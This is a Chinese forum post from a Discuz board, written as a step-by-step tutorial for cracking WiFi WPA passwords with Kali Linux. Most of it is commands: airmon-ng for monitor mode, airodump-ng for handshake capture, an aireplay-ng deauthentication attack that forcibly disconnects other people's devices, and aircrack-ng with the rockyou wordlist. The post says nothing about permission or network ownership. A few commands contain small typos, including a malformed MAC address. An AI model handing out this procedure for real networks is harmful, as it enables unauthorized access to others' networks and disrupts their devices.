最牛论坛

查看: 643|回复: 0

使用Kali Linux暴力破解WiFi密码

[复制链接]

1万

主题

2410

回帖

548万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
5487229
发表于 2022-3-7 08:36 | 显示全部楼层 |阅读模式
使用Kali Linux暴力破解WiFi密码
准备一张支持监听功能并且可以被Kali识别的无线网卡(网上几十块钱就可以买到)

打开kali虚拟机,插入usb无线网卡,选择连接kali虚拟机
5b3354ea-0637-494d-83b8-f7fb81001f33.jpg
打开终端输入:
iwconfig
569c0719-9e7d-4d0b-b2b9-4692e67eb213.jpg
查看无线网卡:
airmon-ng

该命令列出了支持监控模式的无线网卡,如果没有任何输出,则表示无线网卡不支持监控模式
e679503e-1d83-4c0e-83b0-4ade39fc62f8.jpg
记下Interface名称,开启网卡的监听模式:
airmon-ngstart wlan0

如果出现结果如下图,说明还有其他网卡处于监听状态,需要先将其关闭:
airmon-ng check kill
98c55239-043e-4012-9d11-b8a466bb6391.jpg
再次开启监听模式,并记下其Interface:
airmon-ng start wlan0
56a5278e-64fc-4e06-a445-477e48dbd45d.jpg
扫描附近的wifi信号:
airodump-ng wlan0mon

找到自己的目标wifi后使用 Ctrl+C 中止
7dda36e1-6578-4ae2-9f4a-b8f98b25f3b2.jpg
BSSID  AP端的mac地址

PWR 信号强度(绝对值越小,信号越强)

Data 对应路由器的在线数据吞吐量,数值越大,数
值上传量越大

CH 对应路由的频道

ESSID 对应路由器的名称

输入命令抓取握手包:
airodump-ng -c -w --bssid

示例:
airodump-ng -c 6 -w ./test --bssid 24:16:6D:211:E0 wlan0mon
615066d7-9998-4245-aa50-c3c25d79b81e.jpg
这里需要有设备与路由传输数据才可以

保持命令窗口处于运行状态,再打开一个新的命令窗口,进行解除认证攻击,即强制连接到目的wifi路由的设备重新连接:
aireplay-ng - [攻击次数,0为无限攻击] -a -c

示例:
aireplay-ng -0 0 -a 88:C3:97:31:E8:9D -c C0:EE:FB:4F:A2:7F wlan0mon

当下图所示位置显示 WPA hankshake 即成功抓到握手包,将两个命令框都输入 Ctrl + C 终止攻击和握手抓包
356aa5c5-c6a1-4163-9db9-8a6a30fe8065.jpg
8cd674dc-e25c-47ab-afba-3cdef7b91c46.jpg
关闭无线网卡监听模式:
airmon-ng stop wlan0mon

使用字典暴力破解Kali自带有一份无线WiFi密码字典,但是需要先解压:
gzip -d /usr/share/wordlists/rockyou.txt.gz

爆破:
aircrack-ng -w -b

示例:aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 88:C3:97:31:E8:9D test-01.cap

爆破成功后,如图区域会显示 KEY FOUND!(密码)
e6b3ad3e-34f3-433f-8b04-98c50972aeba.jpg
破解的原理还是一个一个试,之所以要抓握手包,是因为握手包中含有经过加密的密码,我们将握手包抓下来后,可以在本地跑字典破解,并且每秒钟可以试几万个密码,但是如果没有握手包,我们只能手动输密码,那样是很慢的,即使可以用程序来跑,也不能保证路由器没有设置错误次数,有可能会禁止连接,即使没有设置错误次数,但是每次与路由器交互的过程所需要耗费的时间也大于一秒

蓝奏地址打不开教程:lanzoui 改成lanzouq 就是把i替换成 q 即可正常访问
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Powered by Discuz! X3.4

© 2019-2024 Comsenz Inc.

返回顶部